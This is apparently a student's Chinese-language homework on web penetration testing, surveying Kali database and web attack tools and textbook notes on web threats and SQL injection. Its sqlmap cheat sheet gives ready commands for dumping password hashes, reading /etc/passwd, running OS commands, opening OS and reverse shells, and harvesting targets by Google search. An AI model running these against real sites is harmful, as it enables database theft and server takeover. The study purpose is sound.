2017-2018-2 20179209《網絡攻防》第五週做業

網絡攻防之Web滲透

視頻學習

數據庫評估軟件

bbqsql

bbqsql是一個Python編寫的盲注工具,當檢測可疑的注入漏洞時會頗有用,同時bbqsql是一個半自動工具,容許客戶自定參數。java

DBPwAudit

DBPwAudit是一個數據庫用戶名和密碼枚舉工具。python

HexorBase

圖形化的密碼破解與鏈接工具,開源。
mysql

jsql

jsql是一款輕量級安全測試工具,能夠探測SQL注入漏洞,它跨平臺,開源免費,將存在注入漏洞的URL貼進來便可進行漏洞利用,圖形化界面親民,但使用效果有待提升。
web

MDBTools

包括一下幾個子工具,具體狀況具體分析使用:sql

  • mdb-export
  • mdb-hexdump
  • mdb-parsecsv
  • mdb-sql
  • mdb-tables

Oracle Scanner

該工具是一個Java開發的Oracle評估工具,它是基於插件結構的,當前有兩個插件能夠作:shell

  • Sid列舉
  • 口令測試
  • 列舉Oracle版本
  • 列舉帳號角色
  • 列舉帳號特權
  • 列舉帳號哈希
  • 列舉審計信息
  • 列舉口令策略
  • 列舉數據庫連接

SidGusser

一樣是針對Oracle的SID鏈接暴力枚舉的工具,SID爲Oracle實例化,Oracle鏈接字符串,經過實例名+用戶+密碼鏈接。
數據庫

tnscmd10g

容許用戶向Oracle數據庫中注入命令執行。
瀏覽器

sqlsus

它是一個開放源代碼的MySQL注入和接管工具,sqlsus使用perl編寫,基於命令行界面。sqlsus能夠獲取數據庫結構,注入本身的sql語句,從服務器下載文件,爬行web站點可寫目錄,上傳和控制後面人,克隆數據庫等等。最好用的兩點是注射獲取數據的速度很是快,另一個最大的特色是自動搜索可寫目錄。首先得生成配置文件sqlsus -g test.conf,而後對配置文件進行修改;接着使用sqlsus test.conf進行注入。
安全

sqlninja

在sql注入方面一直尊sqlmap爲神奇,但sqlninja也有本身的特色。
sqlninja是一款perl語言編寫的一個專門針對MSQSQL的注入工具。和市面上其餘注入工具不一樣,sqlninja沒有花費精力再跑數據庫上,而專一於獲取一個shell,其優勢以下:服務器

  • 一個專門針對MSSQL的注入工具;
  • 可找到元辰sql服務器上的標誌和特徵;
  • sa口令的強力攻擊;
  • 一旦找到sa口令,便可將權限提高到sa;
  • 若是原始xp_cmdshell被禁用,會馬上建立一個可運行的xp_cmdshell;
    等等。

sqlmap

sqlmap是一個開源的漏洞測試工具,它主要用於自動化地偵測和實施SQL注入攻擊以及滲透數據庫服務器。SQLMAP配有強大的偵測引擎,適用於高級滲透測試用戶,不只能夠得到不一樣數據庫的指紋信息,還能夠從數據庫中提取數據,此外還可以處理潛在的文件系統以及經過帶外數據鏈接執行系統命令等。
sqlmap經常使用命令:

sqlmap -u "http://url/news?id=1" –current-user #獲取當前用戶名稱 
sqlmap -u "http://www.xxoo.com/news?id=1" –current-db #獲取當前數據庫名稱 
sqlmap -u "http://www.xxoo.com/news?id=1" –tables -D "db_name" #列表名 
sqlmap -u "http://url/news?id=1" –columns -T "tablename" users-D "db_name" -v 0 #列字段
sqlmap -u "http://url/news?id=1" –dump -C "column_name" -T "table_name" -D "db_name" -v 0 #獲取字段內容
sqlmap -u "http://url/news?id=1" –smart –level 3 –users # smart智能 level 執行測試等級 
sqlmap -u "http://url/news?id=1" –dbms "Mysql" –users # dbms 指定數據庫類型 
sqlmap -u "http://url/news?id=1" –users #列數據庫用戶 
sqlmap -u "http://url/news?id=1" –dbs#列數據庫 
sqlmap -u "http://url/news?id=1" –passwords #數據庫用戶密碼 
sqlmap -u "http://url/news?id=1" –passwords-U root -v 0 #列出指定用戶數據庫密碼 
sqlmap -u "http://url/news?id=1" –dump -C "password,user,id" -T "tablename" -D "db_name" –start 1 –stop 20 #列出指定字段,列出20條 
sqlmap -u "http://url/news?id=1" –dump-all -v 0 #列出全部數據庫全部表 
sqlmap -u "http://url/news?id=1" –privileges #查看權限 
sqlmap -u "http://url/news?id=1" –privileges -U root #查看指定用戶權限 
sqlmap -u "http://url/news?id=1" –is-dba -v 1 #是不是數據庫管理員 
sqlmap -u "http://url/news?id=1" –roles #枚舉數據庫用戶角色 
sqlmap -u "http://url/news?id=1" –udf-inject #導入用戶自定義函數(獲取系統權限!) 
sqlmap -u "http://url/news?id=1" –dump-all –exclude-sysdbs -v 0 #列出當前庫全部表 
sqlmap -u "http://url/news?id=1" –union-cols #union 查詢表記錄 
sqlmap -u "http://url/news?id=1" –cookie "COOKIE_VALUE" #cookie注入 
sqlmap -u "http://url/news?id=1" -b #獲取banner信息 
sqlmap -u "http://url/news?id=1" –data "id=3" #post注入 
sqlmap -u "http://url/news?id=1" -v 1 -f #指紋判別數據庫類型 
sqlmap -u "http://url/news?id=1" –proxy"http://127.0.0.1:8118" #代理注入 
sqlmap -u "http://url/news?id=1″–string」STRING_ON_TRUE_PAGE" #指定關鍵詞 
sqlmap -u "http://url/news?id=1" –sql-shell #執行指定sql命令 
sqlmap -u "http://url/news?id=1" –file /etc/passwd python sqlmap/sqlmap.py -u "http://url/news?id=1" –os-cmd=whoami #執行系統命令 
sqlmap -u "http://url/news?id=1" –os-shell #系統交互shell 
sqlmap -u "http://url/news?id=1" –os-pwn #反彈shell 
sqlmap -u "http://url/news?id=1" –reg-read #讀取win系統註冊表 
sqlmap -u "http://url/news?id=1" –dbs-o "sqlmap.log" #保存進度 
sqlmap -u "http://url/news?id=1" –dbs -o "sqlmap.log" –resume #恢復已保存進度
sqlmap -g "google語法" –dump-all –batch #google搜索注入點自動 跑出全部字段攻擊實例 
sqlmap -u "http://url/news?id=1&Submit=Submit" –cookie="PHPSESSID=41aa833e6d0d28f489ff1ab5a7531406" –string="Surname" –dbms=mysql –users –password

web應用代理

經過應用代理分析數據包,或修改數據包重放、暴力攻擊等安全測試中常常用到。

vega

vega是一個開放源代碼的web應用程序安全測試平臺,Vega可以幫助用戶驗證sql注入、跨站腳本、敏感信息泄露和其餘一些安全漏洞,Vega使用java編寫,有GUI,能夠在Linux、OS X和Windows上運行,vega相似於怕肉絲 proxy等。

webscarab

該軟件是一款代理軟件,包括HTTP代理,網絡爬蟲、網絡蜘蛛,會話ID分析,自動腳本接口。模糊測試工具,WEB格式的編碼/解碼,web服務描述語言和soap解析器等功能模塊,它基於GNU協議使用java編寫,是Webgoat中使用的工具之一。

paros

paros proxy 是一個對web應用程序的漏洞進行評估的代理程序,即一個基於java的web代理程序,能夠評估web應用程序漏洞。它支持動態地編輯/查看http/https,從而改變cookie和表單字段等項目;它包括一個web通訊記錄程序,web全套程序,hash計算器,還有一個能夠測試常見的web應用程序攻擊的掃描器。該工具檢查漏洞形式包括:

  • SQL注入
  • XSS
  • 目錄遍歷
    等。

burpsuite

burpsuite是用於攻擊web應用程序的處理平臺,它也是一個代理,經過默認端口8080運行。使用這個代理,咱們能夠截獲和修改從客戶端到web應用程序的數據包。它包含了一系列burp工具,這些工具之間有大量接口能夠互相通訊,這樣設計的目的是爲了促進和提升真個攻擊效率。平臺中全部工具共享同一robust框架,以便統一處理HTTP請求,持久性,認證,上游代理,日誌記錄,報警和可擴展性。
burpsuite容許攻擊者結合手工和自動技術去枚舉、分析、攻擊web應用程序。這些不一樣的burp工具經過協同工做,有效的分享信息,支持一某種工具中的信息爲基礎供另外一種工具使用的方式發起攻擊。


fuzz工具集

bed

bed(bruteforce exploit dectector)是一個純文本協議的Fuzz工具,可以檢查常見的漏洞,如緩衝區溢出,格式串漏洞,整數溢出等。

fuzz_ipv6

THC出品的針對IPv6協議的模糊測試工具。

wfuzz

針對web應用的模糊測試工具 ,能夠進行web;應用暴力破解,也支持對網站目錄、登陸信息、應用資源文件等的暴力猜解,還能夠進行get和post參數的猜解,sql注入、xss漏洞的測試等。該工具全部功能都依賴於字典。

xsser

主要是對一個頁面或一個點進行測試,看是否存在xss漏洞。

教材學習

web應用體系結構

  • 瀏覽器
  • Web服務器
  • Web應用程序
  • 數據庫
  • 傳輸協議

web應用安全威脅

  • 針對瀏覽器和終端用戶的Web瀏覽器安全威脅
  • 針對傳輸網絡的網絡協議安全威脅
  • 系統層安全威脅
  • Web服務器軟件安全威脅
  • Web應用程序安全威脅
  • Web數據安全威脅

攻擊web服務器軟件的方式:

  • 數據驅動的遠程代碼執行安全漏洞
  • 服務器功能擴展模塊漏洞
  • 樣本文件安全漏洞
  • 源代碼泄露
  • 資源解析漏洞

攻擊web應用程序

  • 針對認證機制的攻擊
  • 受權機制的攻擊
  • 客戶端攻擊
  • 命令執行攻擊
  • 信息暴露
  • 邏輯攻擊

攻擊web數據內容

  • 安全敏感數據泄露
  • 網站篡改
  • 不良信息內容上傳

SQL注入的攻擊步驟和過程

  • 發現SQL注入點
  • 判斷後臺數據庫類型
  • 後臺數據庫中管理員用戶口令猜解
  • 上傳ASP後門,獲得默認帳戶權限
  • 本地權限提高
  • 利用數據庫擴展存儲過程執行Shell命令

web瀏覽器軟件的安全困境三要素:複雜性、可擴展性、連通性方面。

網頁掛馬策略:

  • 內嵌HTML標籤
  • 惡意Script腳本
  • 內嵌對象連接
  • ARP欺騙掛馬
相關文章
相關標籤/搜索